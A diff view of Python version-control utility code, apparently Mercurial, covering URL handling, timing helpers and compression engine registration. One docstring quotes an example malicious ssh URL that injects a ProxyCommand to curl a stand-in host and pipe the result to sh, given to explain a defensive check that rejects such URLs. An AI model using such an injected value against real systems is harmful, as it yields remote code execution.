2831

def localpath(self):

2819

if self.scheme == 'file' or self.scheme == 'bundle':

2832

if self.scheme == 'file' or self.scheme == 'bundle':

2820

path = self.path or '/'

2833

path = self.path or '/'

2821

# For Windows, we need to promote hosts containing drive

2834

# For Windows, we need to promote hosts containing drive

2822

# letters to paths with drive letters.

2835

# letters to paths with drive letters.

2823

if hasdriveletter(self._hostport):

2836

if hasdriveletter(self._hostport):

2824

path = self._hostport + '/' + self.path

2837

path = self._hostport + '/' + self.path

2825

elif (self.host is not None and self.path

2838

elif (self.host is not None and self.path

2826

and not hasdriveletter(path)):

2839

and not hasdriveletter(path)):

2827

path = '/' + path

2840

path = '/' + path

2828

return path

2841

return path

2829

return self._origpath

2842

return self._origpath

2830

2843

2831

def islocal(self):

2844

def islocal(self):

2832

'''whether localpath will return something that posixfile can open'''

2845

'''whether localpath will return something that posixfile can open'''

2833

return (not self.scheme or self.scheme == 'file'

2846

return (not self.scheme or self.scheme == 'file'

2834

or self.scheme == 'bundle')

2847

or self.scheme == 'bundle')

2835

2848

2836

def hasscheme(path):

2849

def hasscheme(path):

2837

return bool(url(path).scheme)

2850

return bool(url(path).scheme)

2838

2851

2839

def hasdriveletter(path):

2852

def hasdriveletter(path):

2840

return path and path[1:2] == ':' and path[0:1].isalpha()

2853

return path and path[1:2] == ':' and path[0:1].isalpha()

2841

2854

2842

def urllocalpath(path):

2855

def urllocalpath(path):

2843

return url(path, parsequery=False, parsefragment=False).localpath()

2856

return url(path, parsequery=False, parsefragment=False).localpath()

2844

2857

2845

def checksafessh(path):

2858

def checksafessh(path):

2846

"""check if a path / url is a potentially unsafe ssh exploit (SEC)

2859

"""check if a path / url is a potentially unsafe ssh exploit (SEC)

2847

2860

2848

This is a sanity check for ssh urls. ssh will parse the first item as

2861

This is a sanity check for ssh urls. ssh will parse the first item as

2849

an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.

2862

an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.

2850

Let's prevent these potentially exploited urls entirely and warn the

2863

Let's prevent these potentially exploited urls entirely and warn the

2851

user.

2864

user.

2852

2865

2853

Raises an error.Abort when the url is unsafe.

2866

Raises an error.Abort when the url is unsafe.

2854

"""

2867

"""

2855

path = urlreq.unquote(path)

2868

path = urlreq.unquote(path)

2856

if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):

2869

if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):

2857

raise error.Abort(_('potentially unsafe url: %r') %

2870

raise error.Abort(_('potentially unsafe url: %r') %

2858

(pycompat.bytestr(path),))

2871

(pycompat.bytestr(path),))

2859

2872

2860

def hidepassword(u):

2873

def hidepassword(u):

2861

'''hide user credential in a url string'''

2874

'''hide user credential in a url string'''

2862

u = url(u)

2875

u = url(u)

2863

if u.passwd:

2876

if u.passwd:

2864

u.passwd = '***'

2877

u.passwd = '***'

2865

return bytes(u)

2878

return bytes(u)

2866

2879

2867

def removeauth(u):

2880

def removeauth(u):

2868

'''remove all authentication information from a url string'''

2881

'''remove all authentication information from a url string'''

2869

u = url(u)

2882

u = url(u)

2870

u.user = u.passwd = None

2883

u.user = u.passwd = None

2871

return bytes(u)

2884

return bytes(u)

2872

2885

2873

timecount = unitcountfn(

2886

timecount = unitcountfn(

2874

(1, 1e3, _('%.0f s')),

2887

(1, 1e3, _('%.0f s')),

2875

(100, 1, _('%.1f s')),

2888

(100, 1, _('%.1f s')),

2876

(10, 1, _('%.2f s')),

2889

(10, 1, _('%.2f s')),

2877

(1, 1, _('%.3f s')),

2890

(1, 1, _('%.3f s')),

2878

(100, 0.001, _('%.1f ms')),

2891

(100, 0.001, _('%.1f ms')),

2879

(10, 0.001, _('%.2f ms')),

2892

(10, 0.001, _('%.2f ms')),

2880

(1, 0.001, _('%.3f ms')),

2893

(1, 0.001, _('%.3f ms')),

2881

(100, 0.000001, _('%.1f us')),

2894

(100, 0.000001, _('%.1f us')),

2882

(10, 0.000001, _('%.2f us')),

2895

(10, 0.000001, _('%.2f us')),

2883

(1, 0.000001, _('%.3f us')),

2896

(1, 0.000001, _('%.3f us')),

2884

(100, 0.000000001, _('%.1f ns')),

2897

(100, 0.000000001, _('%.1f ns')),

2885

(10, 0.000000001, _('%.2f ns')),

2898

(10, 0.000000001, _('%.2f ns')),

2886

(1, 0.000000001, _('%.3f ns')),

2899

(1, 0.000000001, _('%.3f ns')),

2887

)

2900

)

2888

2901

2889

@attr.s

2902

@attr.s

2890

class timedcmstats(object):

2903

class timedcmstats(object):

2891

"""Stats information produced by the timedcm context manager on entering."""

2904

"""Stats information produced by the timedcm context manager on entering."""

2892

2905

2893

# the starting value of the timer as a float (meaning and resulution is

2906

# the starting value of the timer as a float (meaning and resulution is

2894

# platform dependent, see util.timer)

2907

# platform dependent, see util.timer)

2895

start = attr.ib(default=attr.Factory(lambda: timer()))

2908

start = attr.ib(default=attr.Factory(lambda: timer()))

2896

# the number of seconds as a floating point value; starts at 0, updated when

2909

# the number of seconds as a floating point value; starts at 0, updated when

2897

# the context is exited.

2910

# the context is exited.

2898

elapsed = attr.ib(default=0)

2911

elapsed = attr.ib(default=0)

2899

# the number of nested timedcm context managers.

2912

# the number of nested timedcm context managers.

2900

level = attr.ib(default=1)

2913

level = attr.ib(default=1)

2901

2914

2902

def __bytes__(self):

2915

def __bytes__(self):

2903

return timecount(self.elapsed) if self.elapsed else '<unknown>'

2916

return timecount(self.elapsed) if self.elapsed else '<unknown>'

2904

2917

2905

__str__ = encoding.strmethod(__bytes__)

2918

__str__ = encoding.strmethod(__bytes__)

2906

2919

2907

@contextlib.contextmanager

2920

@contextlib.contextmanager

2908

def timedcm(whencefmt, *whenceargs):

2921

def timedcm(whencefmt, *whenceargs):

2909

"""A context manager that produces timing information for a given context.

2922

"""A context manager that produces timing information for a given context.

2910

2923

2911

On entering a timedcmstats instance is produced.

2924

On entering a timedcmstats instance is produced.

2912

2925

2913

This context manager is reentrant.

2926

This context manager is reentrant.

2914

2927

2915

"""

2928

"""

2916

# track nested context managers

2929

# track nested context managers

2917

timedcm._nested += 1

2930

timedcm._nested += 1

2918

timing_stats = timedcmstats(level=timedcm._nested)

2931

timing_stats = timedcmstats(level=timedcm._nested)

2919

try:

2932

try:

2920

with tracing.log(whencefmt, *whenceargs):

2933

with tracing.log(whencefmt, *whenceargs):

2921

yield timing_stats

2934

yield timing_stats

2922

finally:

2935

finally:

2923

timing_stats.elapsed = timer() - timing_stats.start

2936

timing_stats.elapsed = timer() - timing_stats.start

2924

timedcm._nested -= 1

2937

timedcm._nested -= 1

2925

2938

2926

timedcm._nested = 0

2939

timedcm._nested = 0

2927

2940

2928

def timed(func):

2941

def timed(func):

2929

'''Report the execution time of a function call to stderr.

2942

'''Report the execution time of a function call to stderr.

2930

2943

2931

During development, use as a decorator when you need to measure

2944

During development, use as a decorator when you need to measure

2932

the cost of a function, e.g. as follows:

2945

the cost of a function, e.g. as follows:

2933

2946

2934

@util.timed

2947

@util.timed

2935

def foo(a, b, c):

2948

def foo(a, b, c):

2936

pass

2949

pass

2937

'''

2950

'''

2938

2951

2939

def wrapper(*args, **kwargs):

2952

def wrapper(*args, **kwargs):

2940

with timedcm(pycompat.bytestr(func.__name__)) as time_stats:

2953

with timedcm(pycompat.bytestr(func.__name__)) as time_stats:

2941

result = func(*args, **kwargs)

2954

result = func(*args, **kwargs)

2942

stderr = procutil.stderr

2955

stderr = procutil.stderr

2943

stderr.write('%s%s: %s\n' % (

2956

stderr.write('%s%s: %s\n' % (

2944

' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),

2957

' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),

2945

time_stats))

2958

time_stats))

2946

return result

2959

return result

2947

return wrapper

2960

return wrapper

2948

2961

2949

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),

2962

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),

2950

('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

2963

('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

2951

2964

2952

def sizetoint(s):

2965

def sizetoint(s):

2953

'''Convert a space specifier to a byte count.

2966

'''Convert a space specifier to a byte count.

2954

2967

2955

>>> sizetoint(b'30')

2968

>>> sizetoint(b'30')

2956

30

2969

30

2957

>>> sizetoint(b'2.2kb')

2970

>>> sizetoint(b'2.2kb')

2958

2252

2971

2252

2959

>>> sizetoint(b'6M')

2972

>>> sizetoint(b'6M')

2960

6291456

2973

6291456

2961

'''

2974

'''

2962

t = s.strip().lower()

2975

t = s.strip().lower()

2963

try:

2976

try:

2964

for k, u in _sizeunits:

2977

for k, u in _sizeunits:

2965

if t.endswith(k):

2978

if t.endswith(k):

2966

return int(float(t[:-len(k)]) * u)

2979

return int(float(t[:-len(k)]) * u)

2967

return int(t)

2980

return int(t)

2968

except ValueError:

2981

except ValueError:

2969

raise error.ParseError(_("couldn't parse size: %s") % s)

2982

raise error.ParseError(_("couldn't parse size: %s") % s)

2970

2983

2971

class hooks(object):

2984

class hooks(object):

2972

'''A collection of hook functions that can be used to extend a

2985

'''A collection of hook functions that can be used to extend a

2973

function's behavior. Hooks are called in lexicographic order,

2986

function's behavior. Hooks are called in lexicographic order,

2974

based on the names of their sources.'''

2987

based on the names of their sources.'''

2975

2988

2976

def __init__(self):

2989

def __init__(self):

2977

self._hooks = []

2990

self._hooks = []

2978

2991

2979

def add(self, source, hook):

2992

def add(self, source, hook):

2980

self._hooks.append((source, hook))

2993

self._hooks.append((source, hook))

2981

2994

2982

def __call__(self, *args):

2995

def __call__(self, *args):

2983

self._hooks.sort(key=lambda x: x[0])

2996

self._hooks.sort(key=lambda x: x[0])

2984

results = []

2997

results = []

2985

for source, hook in self._hooks:

2998

for source, hook in self._hooks:

2986

results.append(hook(*args))

2999

results.append(hook(*args))

2987

return results

3000

return results

2988

3001

2989

def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):

3002

def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):

2990

'''Yields lines for a nicely formatted stacktrace.

3003

'''Yields lines for a nicely formatted stacktrace.

2991

Skips the 'skip' last entries, then return the last 'depth' entries.

3004

Skips the 'skip' last entries, then return the last 'depth' entries.

2992

Each file+linenumber is formatted according to fileline.

3005

Each file+linenumber is formatted according to fileline.

2993

Each line is formatted according to line.

3006

Each line is formatted according to line.

2994

If line is None, it yields:

3007

If line is None, it yields:

2995

length of longest filepath+line number,

3008

length of longest filepath+line number,

2996

filepath+linenumber,

3009

filepath+linenumber,

2997

function

3010

function

2998

3011

2999

Not be used in production code but very convenient while developing.

3012

Not be used in production code but very convenient while developing.

3000

'''

3013

'''

3001

entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))

3014

entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))

3002

for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]

3015

for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]

3003

][-depth:]

3016

][-depth:]

3004

if entries:

3017

if entries:

3005

fnmax = max(len(entry[0]) for entry in entries)

3018

fnmax = max(len(entry[0]) for entry in entries)

3006

for fnln, func in entries:

3019

for fnln, func in entries:

3007

if line is None:

3020

if line is None:

3008

yield (fnmax, fnln, func)

3021

yield (fnmax, fnln, func)

3009

else:

3022

else:

3010

yield line % (fnmax, fnln, func)

3023

yield line % (fnmax, fnln, func)

3011

3024

3012

def debugstacktrace(msg='stacktrace', skip=0,

3025

def debugstacktrace(msg='stacktrace', skip=0,

3013

f=procutil.stderr, otherf=procutil.stdout, depth=0):

3026

f=procutil.stderr, otherf=procutil.stdout, depth=0):

3014

'''Writes a message to f (stderr) with a nicely formatted stacktrace.

3027

'''Writes a message to f (stderr) with a nicely formatted stacktrace.

3015

Skips the 'skip' entries closest to the call, then show 'depth' entries.

3028

Skips the 'skip' entries closest to the call, then show 'depth' entries.

3016

By default it will flush stdout first.

3029

By default it will flush stdout first.

3017

It can be used everywhere and intentionally does not require an ui object.

3030

It can be used everywhere and intentionally does not require an ui object.

3018

Not be used in production code but very convenient while developing.

3031

Not be used in production code but very convenient while developing.

3019

'''

3032

'''

3020

if otherf:

3033

if otherf:

3021

otherf.flush()

3034

otherf.flush()

3022

f.write('%s at:\n' % msg.rstrip())

3035

f.write('%s at:\n' % msg.rstrip())

3023

for line in getstackframes(skip + 1, depth=depth):

3036

for line in getstackframes(skip + 1, depth=depth):

3024

f.write(line)

3037

f.write(line)

3025

f.flush()

3038

f.flush()

3026

3039

3027

class dirs(object):

3040

class dirs(object):

3028

'''a multiset of directory names from a dirstate or manifest'''

3041

'''a multiset of directory names from a dirstate or manifest'''

3029

3042

3030

def __init__(self, map, skip=None):

3043

def __init__(self, map, skip=None):

3031

self._dirs = {}

3044

self._dirs = {}

3032

addpath = self.addpath

3045

addpath = self.addpath

3033

if safehasattr(map, 'iteritems') and skip is not None:

3046

if safehasattr(map, 'iteritems') and skip is not None:

3034

for f, s in map.iteritems():

3047

for f, s in map.iteritems():

3035

if s[0] != skip:

3048

if s[0] != skip:

3036

addpath(f)

3049

addpath(f)

3037

else:

3050

else:

3038

for f in map:

3051

for f in map:

3039

addpath(f)

3052

addpath(f)

3040

3053

3041

def addpath(self, path):

3054

def addpath(self, path):

3042

dirs = self._dirs

3055

dirs = self._dirs

3043

for base in finddirs(path):

3056

for base in finddirs(path):

3044

if base in dirs:

3057

if base in dirs:

3045

dirs[base] += 1

3058

dirs[base] += 1

3046

return

3059

return

3047

dirs[base] = 1

3060

dirs[base] = 1

3048

3061

3049

def delpath(self, path):

3062

def delpath(self, path):

3050

dirs = self._dirs

3063

dirs = self._dirs

3051

for base in finddirs(path):

3064

for base in finddirs(path):

3052

if dirs[base] > 1:

3065

if dirs[base] > 1:

3053

dirs[base] -= 1

3066

dirs[base] -= 1

3054

return

3067

return

3055

del dirs[base]

3068

del dirs[base]

3056

3069

3057

def __iter__(self):

3070

def __iter__(self):

3058

return iter(self._dirs)

3071

return iter(self._dirs)

3059

3072

3060

def __contains__(self, d):

3073

def __contains__(self, d):

3061

return d in self._dirs

3074

return d in self._dirs

3062

3075

3063

if safehasattr(parsers, 'dirs'):

3076

if safehasattr(parsers, 'dirs'):

3064

dirs = parsers.dirs

3077

dirs = parsers.dirs

3065

3078

3066

def finddirs(path):

3079

def finddirs(path):

3067

pos = path.rfind('/')

3080

pos = path.rfind('/')

3068

while pos != -1:

3081

while pos != -1:

3069

yield path[:pos]

3082

yield path[:pos]

3070

pos = path.rfind('/', 0, pos)

3083

pos = path.rfind('/', 0, pos)

3071

3084

3072

# compression code

3085

# compression code

3073

3086

3074

SERVERROLE = 'server'

3087

SERVERROLE = 'server'

3075

CLIENTROLE = 'client'

3088

CLIENTROLE = 'client'

3076

3089

3077

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',

3090

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',

3078

(u'name', u'serverpriority',

3091

(u'name', u'serverpriority',

3079

u'clientpriority'))

3092

u'clientpriority'))

3080

3093

3081

class compressormanager(object):

3094

class compressormanager(object):

3082

"""Holds registrations of various compression engines.

3095

"""Holds registrations of various compression engines.

3083

3096

3084

This class essentially abstracts the differences between compression

3097

This class essentially abstracts the differences between compression

3085

engines to allow new compression formats to be added easily, possibly from

3098

engines to allow new compression formats to be added easily, possibly from

3086

extensions.

3099

extensions.

3087

3100

3088

Compressors are registered against the global instance by calling its

3101

Compressors are registered against the global instance by calling its

3089

``register()`` method.

3102

``register()`` method.

3090

"""

3103

"""

3091

def __init__(self):

3104

def __init__(self):

3092

self._engines = {}

3105

self._engines = {}

3093

# Bundle spec human name to engine name.

3106

# Bundle spec human name to engine name.

3094

self._bundlenames = {}

3107

self._bundlenames = {}

3095

# Internal bundle identifier to engine name.

3108

# Internal bundle identifier to engine name.

3096

self._bundletypes = {}

3109

self._bundletypes = {}

3097

# Revlog header to engine name.

3110

# Revlog header to engine name.

3098

self._revlogheaders = {}

3111

self._revlogheaders = {}

3099

# Wire proto identifier to engine name.

3112

# Wire proto identifier to engine name.

3100

self._wiretypes = {}

3113

self._wiretypes = {}

3101

3114

3102

def __getitem__(self, key):

3115

def __getitem__(self, key):

3103

return self._engines[key]

3116

return self._engines[key]

3104

3117

3105

def __contains__(self, key):

3118

def __contains__(self, key):

3106

return key in self._engines

3119

return key in self._engines

3107

3120

3108

def __iter__(self):

3121

def __iter__(self):

3109

return iter(self._engines.keys())

3122

return iter(self._engines.keys())

3110

3123

3111

def register(self, engine):

3124

def register(self, engine):

3112

"""Register a compression engine with the manager.

3125

"""Register a compression engine with the manager.

3113

3126

3114

The argument must be a ``compressionengine`` instance.

3127

The argument must be a ``compressionengine`` instance.

3115

"""

3128

"""

3116

if not isinstance(engine, compressionengine):

3129

if not isinstance(engine, compressionengine):

3117

raise ValueError(_('argument must be a compressionengine'))

3130

raise ValueError(_('argument must be a compressionengine'))

3118

3131

3119

name = engine.name()

3132

name = engine.name()

3120

3133

3121

if name in self._engines:

3134

if name in self._engines:

3122

raise error.Abort(_('compression engine %s already registered') %

3135

raise error.Abort(_('compression engine %s already registered') %

3123

name)

3136

name)

3124

3137

3125

bundleinfo = engine.bundletype()

3138

bundleinfo = engine.bundletype()

3126

if bundleinfo:

3139

if bundleinfo:

3127

bundlename, bundletype = bundleinfo

3140

bundlename, bundletype = bundleinfo

3128

3141

3129

if bundlename in self._bundlenames:

3142

if bundlename in self._bundlenames:

3130

raise error.Abort(_('bundle name %s already registered') %

3143

raise error.Abort(_('bundle name %s already registered') %

3131

bundlename)

3144

bundlename)

3132

if bundletype in self._bundletypes:

3145

if bundletype in self._bundletypes:

3133

raise error.Abort(_('bundle type %s already registered by %s') %

3146

raise error.Abort(_('bundle type %s already registered by %s') %

3134

(bundletype, self._bundletypes[bundletype]))

3147

(bundletype, self._bundletypes[bundletype]))

3135

3148

3136

# No external facing name declared.

3149

# No external facing name declared.

3137

if bundlename:

3150

if bundlename:

3138

self._bundlenames[bundlename] = name

3151

self._bundlenames[bundlename] = name

3139

3152

3140

self._bundletypes[bundletype] = name

3153

self._bundletypes[bundletype] = name

3141

3154

3142

wiresupport = engine.wireprotosupport()

3155

wiresupport = engine.wireprotosupport()

3143

if wiresupport:

3156

if wiresupport:

3144

wiretype = wiresupport.name

3157

wiretype = wiresupport.name

3145

if wiretype in self._wiretypes:

3158

if wiretype in self._wiretypes:

3146

raise error.Abort(_('wire protocol compression %s already '

3159

raise error.Abort(_('wire protocol compression %s already '

3147

'registered by %s') %

3160

'registered by %s') %

3148

(wiretype, self._wiretypes[wiretype]))

3161

(wiretype, self._wiretypes[wiretype]))

3149

3162

3150

self._wiretypes[wiretype] = name

3163

self._wiretypes[wiretype] = name

3151

3164

3152

revlogheader = engine.revlogheader()

3165

revlogheader = engine.revlogheader()

3153

if revlogheader and revlogheader in self._revlogheaders:

3166

if revlogheader and revlogheader in self._revlogheaders:

3154

raise error.Abort(_('revlog header %s already registered by %s') %

3167

raise error.Abort(_('revlog header %s already registered by %s') %

3155

(revlogheader, self._revlogheaders[revlogheader]))

3168

(revlogheader, self._revlogheaders[revlogheader]))

3156

3169

3157

if revlogheader:

3170

if revlogheader:

3158

self._revlogheaders[revlogheader] = name

3171

self._revlogheaders[revlogheader] = name

3159

3172

3160

self._engines[name] = engine

3173

self._engines[name] = engine

3161

3174

3162

@property

3175

@property

3163

def supportedbundlenames(self):

3176

def supportedbundlenames(self):

3164

return set(self._bundlenames.keys())

3177

return set(self._bundlenames.keys())

3165

3178

3166

@property

3179

@property

3167

def supportedbundletypes(self):

3180

def supportedbundletypes(self):

3168

return set(self._bundletypes.keys())

3181

return set(self._bundletypes.keys())

3169

3182

3170

def forbundlename(self, bundlename):

3183

def forbundlename(self, bundlename):

3171

"""Obtain a compression engine registered to a bundle name.

3184

"""Obtain a compression engine registered to a bundle name.

3172

3185

3173

Will raise KeyError if the bundle type isn't registered.

3186

Will raise KeyError if the bundle type isn't registered.

3174

3187

3175

Will abort if the engine is known but not available.

3188

Will abort if the engine is known but not available.

3176

"""

3189

"""

3177

engine = self._engines[self._bundlenames[bundlename]]

3190

engine = self._engines[self._bundlenames[bundlename]]

3178

if not engine.available():

3191

if not engine.available():

3179

raise error.Abort(_('compression engine %s could not be loaded') %

3192

raise error.Abort(_('compression engine %s could not be loaded') %

3180

engine.name())

3193

engine.name())

3181

return engine

3194

return engine

3182

3195

3183

def forbundletype(self, bundletype):

3196

def forbundletype(self, bundletype):

3184

"""Obtain a compression engine registered to a bundle type.

3197

"""Obtain a compression engine registered to a bundle type.

3185

3198

3186

Will raise KeyError if the bundle type isn't registered.

3199

Will raise KeyError if the bundle type isn't registered.

3187

3200

3188

Will abort if the engine is known but not available.

3201

Will abort if the engine is known but not available.

3189

"""

3202

"""

3190

engine = self._engines[self._bundletypes[bundletype]]

3203

engine = self._engines[self._bundletypes[bundletype]]

3191

if not engine.available():

3204

if not engine.available():

3192

raise error.Abort(_('compression engine %s could not be loaded') %

3205

raise error.Abort(_('compression engine %s could not be loaded') %

3193

engine.name())

3206

engine.name())

3194

return engine

3207

return engine

3195

3208

3196

def supportedwireengines(self, role, onlyavailable=True):

3209

def supportedwireengines(self, role, onlyavailable=True):

3197

"""Obtain compression engines that support the wire protocol.

3210

"""Obtain compression engines that support the wire protocol.

3198

3211

3199

Returns a list of engines in prioritized order, most desired first.

3212

Returns a list of engines in prioritized order, most desired first.

3200

3213

3201

If ``onlyavailable`` is set, filter out engines that can't be

3214

If ``onlyavailable`` is set, filter out engines that can't be

3202

loaded.

3215

loaded.

3203

"""

3216

"""

3204

assert role in (SERVERROLE, CLIENTROLE)

3217

assert role in (SERVERROLE, CLIENTROLE)

3205

3218

3206

attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

3219

attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

3207

3220

3208

engines = [self._engines[e] for e in self._wiretypes.values()]

3221

engines = [self._engines[e] for e in self._wiretypes.values()]

3209

if onlyavailable:

3222

if onlyavailable:

3210

engines = [e for e in engines if e.available()]

3223

engines = [e for e in engines if e.available()]

3211

3224

3212

def getkey(e):

3225

def getkey(e):

3213

# Sort first by priority, highest first. In case of tie, sort

3226

# Sort first by priority, highest first. In case of tie, sort

3214

# alphabetically. This is arbitrary, but ensures output is

3227

# alphabetically. This is arbitrary, but ensures output is

3215

# stable.

3228

# stable.

3216

w = e.wireprotosupport()

3229

w = e.wireprotosupport()

3217

return -1 * getattr(w, attr), w.name

3230

return -1 * getattr(w, attr), w.name

3218

3231

3219

return list(sorted(engines, key=getkey))

3232

return list(sorted(engines, key=getkey))

3220

3233

3221

def forwiretype(self, wiretype):

3234

def forwiretype(self, wiretype):

3222

engine = self._engines[self._wiretypes[wiretype]]

3235

engine = self._engines[self._wiretypes[wiretype]]

3223

if not engine.available():

3236

if not engine.available():

3224

raise error.Abort(_('compression engine %s could not be loaded') %

3237

raise error.Abort(_('compression engine %s could not be loaded') %

3225

engine.name())

3238

engine.name())

3226

return engine

3239

return engine

3227

3240

3228

def forrevlogheader(self, header):

3241

def forrevlogheader(self, header):

3229

"""Obtain a compression engine registered to a revlog header.

3242

"""Obtain a compression engine registered to a revlog header.

3230

3243

3231

Will raise KeyError if the revlog header value isn't registered.

3244

Will raise KeyError if the revlog header value isn't registered.

3232

"""

3245

"""

3233

return self._engines[self._revlogheaders[header]]

3246

return self._engines[self._revlogheaders[header]]

3234

3247

3235

compengines = compressormanager()

3248

compengines = compressormanager()

3236

3249

3237

class compressionengine(object):

3250

class compressionengine(object):

3238

"""Base class for compression engines.

3251

"""Base class for compression engines.

3239

3252

3240

Compression engines must implement the interface defined by this class.

3253

Compression engines must implement the interface defined by this class.

3241

"""

3254

"""

3242

def name(self):

3255

def name(self):

3243

"""Returns the name of the compression engine.

3256

"""Returns the name of the compression engine.

3244

3257

3245

This is the key the engine is registered under.

3258

This is the key the engine is registered under.

3246

3259

3247

This method must be implemented.

3260

This method must be implemented.

3248

"""

3261

"""

3249

raise NotImplementedError()

3262

raise NotImplementedError()

3250

3263

3251

def available(self):

3264

def available(self):

3252

"""Whether the compression engine is available.

3265

"""Whether the compression engine is available.

3253

3266

3254

The intent of this method is to allow optional compression engines

3267

The intent of this method is to allow optional compression engines

3255

that may not be available in all installations (such as engines relying

3268

that may not be available in all installations (such as engines relying

3256

on C extensions that may not be present).

3269

on C extensions that may not be present).

3257

"""

3270

"""

3258

return True

3271

return True

3259

3272

3260

def bundletype(self):

3273

def bundletype(self):

3261

"""Describes bundle identifiers for this engine.

3274

"""Describes bundle identifiers for this engine.

3262

3275

3263

If this compression engine isn't supported for bundles, returns None.

3276

If this compression engine isn't supported for bundles, returns None.

3264

3277

3265

If this engine can be used for bundles, returns a 2-tuple of strings of

3278

If this engine can be used for bundles, returns a 2-tuple of strings of

3266

the user-facing "bundle spec" compression name and an internal

3279

the user-facing "bundle spec" compression name and an internal

3267

identifier used to denote the compression format within bundles. To

3280

identifier used to denote the compression format within bundles. To

3268

exclude the name from external usage, set the first element to ``None``.

3281

exclude the name from external usage, set the first element to ``None``.

3269

3282

3270

If bundle compression is supported, the class must also implement

3283

If bundle compression is supported, the class must also implement

3271

``compressstream`` and `decompressorreader``.

3284

``compressstream`` and `decompressorreader``.

3272

3285

3273

The docstring of this method is used in the help system to tell users

3286

The docstring of this method is used in the help system to tell users

3274

about this engine.

3287

about this engine.

3275

"""

3288

"""

3276

return None

3289

return None

3277

3290

3278

def wireprotosupport(self):

3291

def wireprotosupport(self):

3279

"""Declare support for this compression format on the wire protocol.

3292

"""Declare support for this compression format on the wire protocol.

3280

3293

3281

If this compression engine isn't supported for compressing wire

3294

If this compression engine isn't supported for compressing wire

3282

protocol payloads, returns None.

3295

protocol payloads, returns None.

3283

3296

3284

Otherwise, returns ``compenginewireprotosupport`` with the following

3297

Otherwise, returns ``compenginewireprotosupport`` with the following

3285

fields:

3298

fields:

3286

3299

3287

* String format identifier

3300

* String format identifier

3288

* Integer priority for the server

3301

* Integer priority for the server

3289

* Integer priority for the client

3302

* Integer priority for the client

3290

3303

3291

The integer priorities are used to order the advertisement of format

3304

The integer priorities are used to order the advertisement of format

3292

support by server and client. The highest integer is advertised

3305

support by server and client. The highest integer is advertised

3293

first. Integers with non-positive values aren't advertised.

3306

first. Integers with non-positive values aren't advertised.

3294

3307

3295

The priority values are somewhat arbitrary and only used for default

3308

The priority values are somewhat arbitrary and only used for default

3296

ordering. The relative order can be changed via config options.

3309

ordering. The relative order can be changed via config options.

3297

3310

3298

If wire protocol compression is supported, the class must also implement

3311

If wire protocol compression is supported, the class must also implement

3299

``compressstream`` and ``decompressorreader``.

3312

``compressstream`` and ``decompressorreader``.

3300

"""

3313

"""

3301

return None

3314

return None

3302

3315

3303

def revlogheader(self):

3316

def revlogheader(self):

3304

"""Header added to revlog chunks that identifies this engine.

3317

"""Header added to revlog chunks that identifies this engine.

3305

3318

3306

If this engine can be used to compress revlogs, this method should

3319

If this engine can be used to compress revlogs, this method should

3307

return the bytes used to identify chunks compressed with this engine.

3320

return the bytes used to identify chunks compressed with this engine.

3308

Else, the method should return ``None`` to indicate it does not

3321

Else, the method should return ``None`` to indicate it does not

3309

participate in revlog compression.

3322

participate in revlog compression.

3310

"""

3323

"""

3311

return None

3324

return None

3312

3325

3313

def compressstream(self, it, opts=None):

3326

def compressstream(self, it, opts=None):

3314

"""Compress an iterator of chunks.

3327

"""Compress an iterator of chunks.

3315

3328

3316

The method receives an iterator (ideally a generator) of chunks of

3329

The method receives an iterator (ideally a generator) of chunks of

3317

bytes to be compressed. It returns an iterator (ideally a generator)

3330

bytes to be compressed. It returns an iterator (ideally a generator)

3318

of bytes of chunks representing the compressed output.

3331

of bytes of chunks representing the compressed output.

3319

3332

3320

Optionally accepts an argument defining how to perform compression.

3333

Optionally accepts an argument defining how to perform compression.

3321

Each engine treats this argument differently.

3334

Each engine treats this argument differently.

3322

"""

3335

"""

3323

raise NotImplementedError()

3336

raise NotImplementedError()

3324

3337

3325

def decompressorreader(self, fh):

3338

def decompressorreader(self, fh):

3326

"""Perform decompression on a file object.

3339

"""Perform decompression on a file object.

3327

3340

3328

Argument is an object with a ``read(size)`` method that returns

3341

Argument is an object with a ``read(size)`` method that returns

3329

compressed data. Return value is an object with a ``read(size)`` that

3342

compressed data. Return value is an object with a ``read(size)`` that

3330

returns uncompressed data.

3343

returns uncompressed data.

3331

"""

3344

"""

3332

raise NotImplementedError()

3345

raise NotImplementedError()

3333

3346

3334

def revlogcompressor(self, opts=None):

3347

def revlogcompressor(self, opts=None):

3335

"""Obtain an object that can be used to compress revlog entries.

3348

"""Obtain an object that can be used to compress revlog entries.

3336

3349

3337

The object has a ``compress(data)`` method that compresses binary

3350

The object has a ``compress(data)`` method that compresses binary

3338

data. This method returns compressed binary data or ``None`` if

3351

data. This method returns compressed binary data or ``None`` if

3339

the data could not be compressed (too small, not compressible, etc).

3352

the data could not be compressed (too small, not compressible, etc).

3340

The returned data should have a header uniquely identifying this

3353

The returned data should have a header uniquely identifying this

3341

compression format so decompression can be routed to this engine.

3354

compression format so decompression can be routed to this engine.

3342

This header should be identified by the ``revlogheader()`` return

3355

This header should be identified by the ``revlogheader()`` return

3343

value.

3356

value.

3344

3357

3345

The object has a ``decompress(data)`` method that decompresses

3358

The object has a ``decompress(data)`` method that decompresses

3346

data. The method will only be called if ``data`` begins with

3359

data. The method will only be called if ``data`` begins with

3347

``revlogheader()``. The method should return the raw, uncompressed

3360

``revlogheader()``. The method should return the raw, uncompressed

3348

data or raise a ``RevlogError``.

3361

data or raise a ``RevlogError``.

3349

3362

3350

